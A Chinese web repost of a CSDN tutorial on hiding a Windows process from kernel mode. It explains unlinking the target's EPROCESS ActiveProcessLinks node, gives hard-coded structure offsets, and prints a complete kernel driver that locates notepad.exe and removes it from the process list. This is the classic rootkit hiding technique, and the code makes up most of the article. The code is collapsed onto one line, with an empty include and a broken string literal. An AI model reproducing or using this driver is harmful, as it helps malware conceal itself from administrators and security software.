聯(lián)系我們 - 廣告服務(wù) - 聯(lián)系電話:
您的當(dāng)前位置: > 關(guān)注 > > 正文

【進(jìn)程隱藏之內(nèi)核】EPROCESSSS結(jié)構(gòu)體

來源:CSDN 時間:2023-02-07 10:26:41


(相關(guān)資料圖)

進(jìn)程隱藏之內(nèi)核實(shí)現(xiàn)

1、在內(nèi)核模式下,系統(tǒng)為每個進(jìn)程維護(hù)了一個EPROCESS結(jié)構(gòu)體,系統(tǒng)所有的進(jìn)程是通過EPROCESS結(jié)構(gòu)體中的一個ActiveProcessLinks指向的雙端鏈表連接起來的,通過winDBG內(nèi)核調(diào)試工具就可以發(fā)現(xiàn)并獲取其相對于EPROCESS結(jié)構(gòu)體的地址(0x88),這樣我們可以通過遍歷該循環(huán)鏈表找到我們的目的進(jìn)程將其鏈表的節(jié)點(diǎn)刪除即可隱藏該進(jìn)程。(EPROCESS中進(jìn)程PID相對地址為ox84,進(jìn)程名字相對地址為0x174)。

代碼如下:

/****************************   在內(nèi)核模式下隱藏進(jìn)程      sky_2012.12.13****************************/#include#define DWORD ULONGvoid DriverUnload(IN PDRIVER_OBJECT Driver_Object);NTSTATUS HelloDDKDispatchRoutine(IN PDEVICE_OBJECT pDevObj, IN PIRP pIrp);//根據(jù)進(jìn)程Pid找到進(jìn)程DWORD FindProcessEPROCESS(PANSI_STRING PsName, OUT int* flg);ANSI_STRING Process_Name;NTSTATUS DriverEntry(IN PDRIVER_OBJECT Driver_Object, IN PUNICODE_STRING RegisterPath){PLIST_ENTRY  pre_ActiveProcessLink;int flg = 0;DWORD preprocess = 0x00000000;CHAR *string1 = "notepad.exe";Driver_Object->MajorFunction[IRP_MJ_CREATE] = HelloDDKDispatchRoutine;Driver_Object->MajorFunction[IRP_MJ_CLOSE]  = HelloDDKDispatchRoutine;Driver_Object->DriverUnload = DriverUnload;//找到我們要保護(hù)的進(jìn)程的前一個的EPROCESSRtlInitAnsiString(&Process_Name,string1);preprocess = FindProcessEPROCESS(&Process_Name,&flg);//根據(jù)進(jìn)程的ActiveProcessLink刪除掉我們的目的進(jìn)程的ActiveProcessLink的連表節(jié)點(diǎn)if(flg){pre_ActiveProcessLink = (PLIST_ENTRY)(preprocess);pre_ActiveProcessLink->Flink = pre_ActiveProcessLink->Flink->Flink;pre_ActiveProcessLink->Flink->Blink = pre_ActiveProcessLink;KdPrint(("Delete Success!\n"));}else{KdPrint(("notepad.exe dos"nt exist!\n"));}return STATUS_SUCCESS;}DWORD FindProcessEPROCESS(PANSI_STRING PsName, OUT int* flg){ANSI_STRING CurName;PLIST_ENTRY   cut_ActiveProcessLink = 0x00000000;DWORD CUR_EPROCESS = 0x00000000;DWORD curent_id = 0;//記錄當(dāng)前idDWORD start_id =0;int count = 0;//記錄id總數(shù)CUR_EPROCESS = (DWORD)PsGetCurrentProcess();curent_id = *((DWORD*)(CUR_EPROCESS + 0x84));start_id = curent_id;RtlInitAnsiString(&CurName,(char*)CUR_EPROCESS + 0x174);cut_ActiveProcessLink = (PLIST_ENTRY)(CUR_EPROCESS + 0x88);//如果相同if(!RtlCompareString(PsName, &CurName,FALSE)){*flg = 1;return ((DWORD)(cut_ActiveProcessLink->Blink));}//接著遍歷while(1){count++;cut_ActiveProcessLink = cut_ActiveProcessLink->Flink;RtlInitAnsiString(&CurName,(char*)cut_ActiveProcessLink - 0x88 + 0x174);curent_id = *((DWORD*)((DWORD)cut_ActiveProcessLink - 0x88 + 0x84));if(!RtlCompareString(PsName,&CurName,FALSE)){*flg = 1;return ((DWORD)(cut_ActiveProcessLink->Blink));}else if (count>=1&&(start_id == curent_id)){KdPrint(("沒有找到!\n"));return 0x00000000;}}}//默認(rèn)的例程N(yùn)TSTATUS HelloDDKDispatchRoutine(IN PDEVICE_OBJECT pDevObj, IN PIRP pIrp){NTSTATUS status = STATUS_SUCCESS;KdPrint(("Enter HelloDDKDispatchRoutine\n"));// 完成IRPpIrp->IoStatus.Status = status;IoCompleteRequest(pIrp, IO_NO_INCREMENT );KdPrint(("Leave HelloDDKDispatchRoutine\n"));return status;}//設(shè)置卸載例程void DriverUnload(IN PDRIVER_OBJECT Driver_Object){KdPrint(("DriverUnload!\n"));}

責(zé)任編輯:

標(biāo)簽:

相關(guān)推薦:

精彩放送:

新聞聚焦
Top